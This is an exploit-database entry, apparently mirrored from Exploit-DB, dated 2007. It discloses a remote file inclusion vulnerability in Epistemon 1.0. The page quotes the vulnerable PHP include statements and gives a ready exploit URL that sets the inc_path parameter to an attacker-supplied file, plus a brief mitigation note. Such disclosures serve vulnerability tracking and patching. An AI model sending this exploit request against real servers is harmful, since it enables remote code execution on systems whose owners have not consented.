header-logo
Suggest Exploit
vendor:
Epistemon
by:
GolD_M(Mahmnood_ali)
N/A
CVSS
HIGH
Remote File Include
CWE
Product Name: Epistemon
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Epistemon 1.0 <= Remote File Include Vulnerability

The vulnerability allows an attacker to include a remote file in the application's code, potentially leading to remote code execution.

Mitigation:

The vulnerability can be mitigated by ensuring that user-supplied input is properly validated and sanitized before being used in the include statement.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Epistemon 1.0 <=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:

http://sourcesup.cru.fr/frs/download.php/668/Epistemon_V1.tgz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

V.CODE: In : /plateforme/code/inc/common.inc.php

include($inc_path.'config.php');
include ($inc_path."i18n.inc.php");
include ($inc_path."const.inc.php")      ;
include ($inc_path."c_init.inc".$ext)     ;
include ($inc_path."c_chapitre.inc".$ext) ;
include ($inc_path."c_color.inc".$ext)    ;

include ($inc_path."c_connexion.inc".$ext);
include ($inc_path."c_file.inc".$ext)     ;
include ($inc_path."c_formation.inc".$ext);
include ($inc_path."c_groupe.inc".$ext)   ;
include ($inc_path."c_header.inc".$ext)   ;
include ($inc_path."c_mail.inc".$ext)     ;
include ($inc_path."c_membre.inc".$ext)   ;
include ($inc_path."c_webmail.inc".$ext)  ;
include ($inc_path."c_module.inc".$ext)   ;
include ($inc_path."c_mysql.inc".$ext)    ;
include ($inc_path."c_phorum.inc".$ext)   ;
include ($inc_path."c_tuteur.inc".$ext)   ;
include ($inc_path."c_document.inc".$ext) ;
include ($inc_path."html.inc".$ext)       ;
include ($inc_path."c_complement.inc".$ext);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2007-02-01]

Navigation

Suggest Exploit

Services By CQR